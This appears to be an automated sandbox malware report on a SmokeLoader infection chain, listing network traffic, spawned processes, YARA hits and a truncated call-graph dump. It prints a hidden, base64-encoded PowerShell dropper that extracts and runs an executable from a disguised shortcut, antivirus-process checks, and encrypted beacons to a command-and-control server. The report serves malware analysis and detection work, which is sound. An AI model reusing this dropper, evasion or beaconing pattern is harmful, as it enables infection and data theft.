                                                                                                                                                              Nov 6, 2024 17:36:31.629148960 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ftnmwgsaafwce.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:31.629257917 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:31.886981010 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:11:32:33
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA
                                                                                                                                                              Imagebase:0x7ff7926f0000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:11:32:33
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66c550000
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:11:32:34
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\winpdf.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:1'048'590 bytes
                                                                                                                                                              MD5 hash:80FDAC591563D6CE2CAC6B0D254B8AC7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:11:32:35
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat
                                                                                                                                                              Imagebase:0xeb0000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:11:32:35
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66c550000
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:11:32:36
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:tasklist
                                                                                                                                                              Imagebase:0x3a0000
                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:11:32:36
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:11:32:36
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:tasklist
                                                                                                                                                              Imagebase:0x3a0000
                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:11:32:36
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:11:32:37
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:cmd /c md 367647
                                                                                                                                                              Imagebase:0xeb0000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:11:32:37
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:findstr /V "HOWCONCERNEDPAMMURDER" Mice
                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:11:32:37
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:cmd /c copy /b ..\Is + ..\Ashley + ..\Allan + ..\Span Y
                                                                                                                                                              Imagebase:0xeb0000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:11:32:37
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\367647\Productive.pif
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:Productive.pif Y
                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                              File size:893'608 bytes
                                                                                                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 5%, ReversingLabs
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:11:32:37
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:choice /d y /t 15
                                                                                                                                                              Imagebase:0x350000
                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:11:33:31
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\367647\Productive.pif
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\367647\Productive.pif
                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                              File size:893'608 bytes
                                                                                                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:11:33:42
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                              Imagebase:0x7ff6a8560000
                                                                                                                                                              File size:4'849'904 bytes
                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:11:34:01
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\fejhsit
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\fejhsit
                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                              File size:893'608 bytes
                                                                                                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 5%, ReversingLabs
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:18
                                                                                                                                                              Start time:11:34:03
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                              File size:4'419'176 bytes
                                                                                                                                                              MD5 hash:ED8F152C2498988F130BA8D85B321E12
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:11:34:04
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff6a8560000
                                                                                                                                                              File size:4'849'904 bytes
                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:11:34:06
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                              File size:4'419'176 bytes
                                                                                                                                                              MD5 hash:ED8F152C2498988F130BA8D85B321E12
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:11:34:07
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff6a8560000
                                                                                                                                                              File size:4'849'904 bytes
                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:11:34:08
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                              File size:4'419'176 bytes
                                                                                                                                                              MD5 hash:ED8F152C2498988F130BA8D85B321E12
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.24415691704.0000000003431000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:23
                                                                                                                                                              Start time:11:34:09
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff6a8560000
                                                                                                                                                              File size:4'849'904 bytes
                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000017.00000002.24415374233.0000000000A21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:11:34:10
                                                                                                                                                              Start date:06/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                              File size:4'419'176 bytes
                                                                                                                                                              MD5 hash:ED8F152C2498988F130BA8D85B321E12
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Reset < >
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.19481458129.00007FFA7ED80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7ED80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffa7ed80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 49b35e0c7d2e3986b7408ece0e06913f289cde56cdde63ac89c408c10ada98b8
                                                                                                                                                                • Instruction ID: 4510be8556722344120c8dec76a16d0a0865e621cdc35f4a56a8905a90af7d2f
                                                                                                                                                                • Opcode Fuzzy Hash: 49b35e0c7d2e3986b7408ece0e06913f289cde56cdde63ac89c408c10ada98b8
                                                                                                                                                                • Instruction Fuzzy Hash: 56112C7270C7804FD758DB1CA84297977E1FB96324F00066EE0CA87153D63AE846C785
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.19481458129.00007FFA7ED80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7ED80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffa7ed80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                                • Instruction ID: 11d7f738c28735f751f88f88cb22edb8eb7088cccc71f88e54cf72fea7b38656
                                                                                                                                                                • Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                                • Instruction Fuzzy Hash: 7701677121CB0D8FD744EF0CE491AA5B7E0FB95324F10056EE58EC3651D636E892CB45

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:17.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:20.6%
                                                                                                                                                                Total number of Nodes:1486
                                                                                                                                                                Total number of Limit Nodes:35
                                                                                                                                                                execution_graph 4324 402fc0 4325 401446 18 API calls 4324->4325 4326 402fc7 4325->4326 4327 403017 4326->4327 4328 40300a 4326->4328 4331 401a13 4326->4331 4330 406805 18 API calls 4327->4330 4329 401446 18 API calls 4328->4329 4329->4331 4330->4331 4332 4023c1 4333 40145c 18 API calls 4332->4333 4334 4023c8 4333->4334 4337 40726a 4334->4337 4340 406ed2 CreateFileW 4337->4340 4341 406f04 4340->4341 4342 406f1e ReadFile 4340->4342 4344 4062a3 11 API calls 4341->4344 4343 406f84 4342->4343 4345 4023d6 4342->4345 4343->4345 4346 4071e3 CloseHandle 4343->4346 4347 406f9b ReadFile lstrcpynA lstrcmpA 4343->4347 4349 406fdd 4343->4349 4344->4345 4346->4345 4347->4343 4348 406fe2 SetFilePointer ReadFile 4347->4348 4348->4346 4350 4070a8 ReadFile 4348->4350 4349->4346 4351 407138 4350->4351 4351->4349 4351->4350 4352 40715f SetFilePointer GlobalAlloc ReadFile 4351->4352 4353 4071a3 4352->4353 4354 4071bf lstrcpynW GlobalFree 4352->4354 4353->4353 4353->4354 4354->4346 4355 401cc3 4356 40145c 18 API calls 4355->4356 4357 401cca lstrlenW 4356->4357 4358 4030dc 4357->4358 4359 4030e3 4358->4359 4361 405f51 wsprintfW 4358->4361 4361->4359 4376 401c46 4377 40145c 18 API calls 4376->4377 4378 401c4c 4377->4378 4379 4062a3 11 API calls 4378->4379 4380 401c59 4379->4380 4381 406c9b 81 API calls 4380->4381 4382 401c64 4381->4382 4383 403049 4384 401446 18 API calls 4383->4384 4387 403050 4384->4387 4385 406805 18 API calls 4386 401a13 4385->4386 4387->4385 4387->4386 4388 40204a 4389 401446 18 API calls 4388->4389 4390 402051 IsWindow 4389->4390 4391 4018d3 4390->4391 4392 40324c 4393 403277 4392->4393 4394 40325e SetTimer 4392->4394 4395 4032cc 4393->4395 4396 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4393->4396 4394->4393 4396->4395 4397 4048cc 4398 4048f1 4397->4398 4412 4048da 4397->4412 4399 4048ff IsWindowVisible 4398->4399 4404 404916 4398->4404 4400 40490c 4399->4400 4399->4412 4413 40484e SendMessageW 4400->4413 4401 404960 CallWindowProcW 4403 4048e0 4401->4403 4404->4401 4418 406009 lstrcpynW 4404->4418 4406 404945 4419 405f51 wsprintfW 4406->4419 4408 40494c 4409 40141d 79 API calls 4408->4409 4410 404953 4409->4410 4420 406009 lstrcpynW 4410->4420 4412->4401 4412->4403 4414 404871 GetMessagePos ScreenToClient SendMessageW 4413->4414 4415 4048ab SendMessageW 4413->4415 4416 4048a3 4414->4416 4417 4048a8 4414->4417 4415->4416 4416->4404 4417->4415 4418->4406 4419->4408 4420->4412 4421 4022cc 4422 40145c 18 API calls 4421->4422 4423 4022d3 4422->4423 4424 4062d5 2 API calls 4423->4424 4425 4022d9 4424->4425 4427 4022e8 4425->4427 4430 405f51 wsprintfW 4425->4430 4428 4030e3 4427->4428 4431 405f51 wsprintfW 4427->4431 4430->4427 4431->4428 4212 4050cd 4213 405295 4212->4213 4214 4050ee GetDlgItem GetDlgItem GetDlgItem 4212->4214 4215 4052c6 4213->4215 4216 40529e GetDlgItem CreateThread CloseHandle 4213->4216 4223 405162 4214->4223 4217 4052f4 4215->4217 4218 4052e0 ShowWindow ShowWindow 4215->4218 4219 405305 4215->4219 4216->4215 4256 405047 81 API calls 4216->4256 4217->4219 4220 40534b 4217->4220 4221 40532b ShowWindow 4217->4221 4254 403d98 4218->4254 4222 403dca 8 API calls 4219->4222 4220->4219 4228 40535d 4220->4228 4221->4220 4226 40533d 4221->4226 4225 40528e 4222->4225 4227 406805 18 API calls 4223->4227 4229 404f72 25 API calls 4226->4229 4230 405181 4227->4230 4228->4225 4233 405376 CreatePopupMenu 4228->4233 4229->4220 4231 4062a3 11 API calls 4230->4231 4232 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4231->4232 4235 4051f3 4232->4235 4236 4051d7 SendMessageW SendMessageW 4232->4236 4234 406805 18 API calls 4233->4234 4237 405386 AppendMenuW 4234->4237 4238 405206 4235->4238 4239 4051f8 SendMessageW 4235->4239 4236->4235 4240 405399 GetWindowRect 4237->4240 4241 4053ac 4237->4241 4242 403d3f 19 API calls 4238->4242 4239->4238 4243 4053b3 TrackPopupMenu 4240->4243 4241->4243 4244 405216 4242->4244 4243->4225 4247 4053d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4243->4247 4245 405253 GetDlgItem SendMessageW 4244->4245 4246 40521f ShowWindow 4244->4246 4245->4225 4250 405276 SendMessageW SendMessageW 4245->4250 4248 405242 4246->4248 4249 405235 ShowWindow 4246->4249 4252 40542f GlobalUnlock SetClipboardData CloseClipboard 4247->4252 4248->4245 4249->4248 4250->4225 4252->4225 4255 403dac 4254->4255 4255->4217 4432 4030cf 4433 40145c 18 API calls 4432->4433 4434 4030d6 4433->4434 4435 4030dc 4434->4435 4439 4063ac GlobalAlloc lstrlenW 4434->4439 4437 4030e3 4435->4437 4466 405f51 wsprintfW 4435->4466 4441 4063e2 4439->4441 4442 406434 4439->4442 4440 40640f GetVersionExW 4440->4442 4443 40643e 4440->4443 4441->4440 4467 40602b CharUpperW 4441->4467 4442->4435 4445 406464 LoadLibraryA 4443->4445 4446 40644d 4443->4446 4445->4442 4448 406482 GetProcAddress GetProcAddress GetProcAddress 4445->4448 4446->4442 4447 406585 GlobalFree 4446->4447 4449 40659b LoadLibraryA 4447->4449 4450 4066dd FreeLibrary 4447->4450 4453 4064aa 4448->4453 4456 4065f5 4448->4456 4449->4442 4452 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4449->4452 4450->4442 4451 406651 FreeLibrary 4460 40662a 4451->4460 4452->4456 4454 4064ce FreeLibrary GlobalFree 4453->4454 4453->4456 4462 4064ea 4453->4462 4454->4442 4455 4066ea 4459 4066ef CloseHandle FreeLibrary 4455->4459 4456->4451 4456->4460 4457 4064fc lstrcpyW OpenProcess 4458 40654f CloseHandle CharUpperW lstrcmpW 4457->4458 4457->4462 4458->4456 4458->4462 4461 406704 CloseHandle 4459->4461 4460->4455 4463 406685 lstrcmpW 4460->4463 4464 4066b6 CloseHandle 4460->4464 4465 4066d4 CloseHandle 4460->4465 4461->4459 4462->4447 4462->4457 4462->4458 4463->4460 4463->4461 4464->4460 4465->4450 4466->4437 4467->4441 4468 407752 4472 407344 4468->4472 4469 407c6d 4470 4073c2 GlobalFree 4471 4073cb GlobalAlloc 4470->4471 4471->4469 4471->4472 4472->4469 4472->4470 4472->4471 4472->4472 4473 407443 GlobalAlloc 4472->4473 4474 40743a GlobalFree 4472->4474 4473->4469 4473->4472 4474->4473 4475 401dd3 4476 401446 18 API calls 4475->4476 4477 401dda 4476->4477 4478 401446 18 API calls 4477->4478 4479 4018d3 4478->4479 4487 402e55 4488 40145c 18 API calls 4487->4488 4489 402e63 4488->4489 4490 402e79 4489->4490 4491 40145c 18 API calls 4489->4491 4492 405e30 2 API calls 4490->4492 4491->4490 4493 402e7f 4492->4493 4517 405e50 GetFileAttributesW CreateFileW 4493->4517 4495 402e8c 4496 